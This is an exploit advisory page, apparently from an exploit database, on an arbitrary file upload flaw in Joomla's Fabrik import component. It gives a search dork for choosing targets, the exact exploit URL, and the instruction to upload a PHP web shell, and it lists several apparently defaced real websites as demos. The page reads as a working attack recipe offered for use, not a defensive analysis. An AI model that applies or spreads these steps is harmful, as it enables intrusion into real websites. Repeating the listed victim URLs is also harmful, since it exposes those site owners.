F3D4İ's Joomla Arbitrary File Upload Vulnerability

2017.01.08
Credit: F3D4İ
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : F3D4İ's Joomla Arbitrary File Upload Vulnerability # Google Dork : inurl:viewtable?cid= site:it # Tested On : [ Windows- Linux ] # Date: 07.01.2017 # Exploit Author: F3D4İ #Author Details:twitter.com/f3d4i6 #Tested on: Kali Linux 2.0 / Windows 7-8-10 #Youtube Lİnk : https://youtu.be/TFEVrNYuJBk ###################### # [+] DESCRIPTION : ###################### # 1:Search Google Dork and Choose a Target # 2: exploit: /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 # 3: upload shell.php or index.html # 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php ------------------------------------------------ This exploit working all joomla verison but website of kind italia. #demo: http://www.ghostshockey.it/media/index.html http://www.notaiopulvirenti.it/media/index.html http://www.alphasoft.it/media/index.html http://deuil61.123.fr/media/index.html http://www.filuse.it/sito/media/index.html http://www.aquoschemical.it/sito/media/index.html http://www.decanatoappianogentile.it/grest/media/index.html http://www.multimediaform.it/media/index.html #Br0thers: By B0zoklu - Tmk - Kara Murat -Trajedi - DArkSide - DarkDemon - E.C - M4ni4c - M4DD3 #We are Turkish Hackers

References:

https://youtu.be/TFEVrNYuJBk


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top